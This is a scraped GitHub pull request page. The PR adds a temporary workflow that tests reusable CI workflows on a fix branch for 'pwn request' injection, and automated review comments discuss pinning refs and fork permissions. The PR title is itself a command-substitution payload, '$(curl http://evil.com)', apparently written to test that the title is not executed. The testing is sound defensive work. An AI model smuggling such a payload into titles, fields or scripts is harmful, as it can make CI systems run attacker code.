Repository navigation
$(curl http://evil.com) #625
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Changes from all commits
File filter
Filter by extension
Conversations
Jump to
Diff view
Diff view
There are no files selected for viewing
| Original file line number | Diff line number | Diff line change | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| @@ -0,0 +1,20 @@ | ||||||||||||||||||||||||||||||
| name: Test PR Workflows (TEMPORARY - DELETE AFTER TESTING) | ||||||||||||||||||||||||||||||
|
|
||||||||||||||||||||||||||||||
| on: | ||||||||||||||||||||||||||||||
| pull_request: | ||||||||||||||||||||||||||||||
| types: [opened, edited, reopened, synchronize] | ||||||||||||||||||||||||||||||
|
Comment on lines
+4
to
+5
|
||||||||||||||||||||||||||||||
| pull_request: | |
| types: [opened, edited, reopened, synchronize] | |
| workflow_dispatch: |
Copilot
AI
Apr 8, 2026
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
The reusable workflows are referenced via a mutable branch ref (@fix/SECCMP-1797-pwn-request-injection). For workflow security hardening, pin reusable workflow calls to an immutable ref (a commit SHA or a protected, versioned tag) to avoid supply-chain risk if the branch changes.
| uses: marklogic/pr-workflows/.github/workflows/jira-id-check.yml@fix/SECCMP-1797-pwn-request-injection | |
| with: | |
| pr-title: ${{ github.event.pull_request.title }} | |
| test-copyright-check: | |
| name: Test Copyright Check | |
| uses: marklogic/pr-workflows/.github/workflows/copyright-check.yml@fix/SECCMP-1797-pwn-request-injection | |
| uses: marklogic/pr-workflows/.github/workflows/jira-id-check.yml@<FULL_40_CHAR_COMMIT_SHA_FOR_fix/SECCMP-1797-pwn-request-injection> | |
| with: | |
| pr-title: ${{ github.event.pull_request.title }} | |
| test-copyright-check: | |
| name: Test Copyright Check | |
| uses: marklogic/pr-workflows/.github/workflows/copyright-check.yml@<FULL_40_CHAR_COMMIT_SHA_FOR_fix/SECCMP-1797-pwn-request-injection> |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This workflow is triggered on
pull_request, but the repo’s main PR workflow usespull_request_targetspecifically to support PRs from forks (.github/workflows/pr-workflow.yaml:4-6). Withpull_request,GITHUB_TOKENis read-only on fork PRs, so thetest-copyright-checkjob won’t actually receive the requestedpull-requests: write/issues: writepermissions and the reusable workflow may fail to comment/update checks. Consider usingpull_request_target(with the reusable workflow designed to avoid checking out untrusted code) if you need this to behave like the main PR workflow.